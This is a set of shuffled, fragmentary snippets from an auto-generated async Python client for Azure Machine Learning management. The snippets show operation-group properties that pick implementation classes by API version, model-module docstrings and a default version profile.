"CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01':", "# 
-------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from", "version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "base_url: Service URL :type base_url: str :param profile: A profile definition, from KnownProfiles", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version))", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version", "import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return", "depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01:", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version))", "..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. 
:type subscription_id: str :param", "'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self):", "have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance", "the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version ==", "2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version", "* 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` 
\"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "Generator. # Changes may cause incorrect behavior and will be lost if the", "fake class to support current implemetation of MultiApiClientMixin.\" Will be removed in final", "'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview", "v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview:", "profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default", "\"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as", "depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if", "\"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as", "import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "@property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` *", "v for k, 
v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION):", "= self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the", "..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations", "operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version", "1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = 
self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have", "LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview',", "ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations", "ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: 
:mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` *", "on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version", "api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass", "header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({", "import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API", "'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the", "group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on", "metric(self): \"\"\"Instance depends on the API version: * v1.0: 
:class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version =", "WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass", "version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from", "does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version:", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0:", "UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass", "api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k, v", "from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "'data_call'\".format(api_version)) return 
OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the", "@property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\"", "return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif", "api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as", ":mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>`", "'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status':", "else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client,", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from", "DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 
'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0',", "def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview:", "def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version:", "assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version =", "api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>`", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version", "available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>`", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from", "import DatasetsV1Operations as OperationClass else: raise 
ValueError(\"API version {} does not have operation", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return", ":class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations", "'2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self):", "* 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance", "version: * 1.5.0: 
:class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from", "have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance", "..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container')", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview':", "\"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as", "ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version))", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version ==", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise", "2022-02-01-preview: 
:class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01':", "PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass", "..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` *", "import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "be removed in final version of multiapi azure-core based client \"\"\" pass class", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0:", "raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config,", "version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "= self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else:", "api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version", "'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does", "import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as", "* v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` *", "2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': 
from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations", "'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self,", "..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return", "import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version ==", "group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on", "import RunOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {}", "def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview:", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass elif api_version == 
'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif", "target subscription. :type subscription_id: str :param api_version: API version to use if no", "= self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return", "RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API", "== '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {}", "BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass", "have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client,", "have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance", "'2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from 
..v2022_02_01_preview.aio.operations", "type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url,", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API", "Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License.", "2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\"", "latest API version available on public Azure. For production, you should stick to", "present. 
\"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: {", "ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>`", "API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version", "API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version", "operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview:", "self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise", "ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version: *", "Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as", "version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from", "have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 
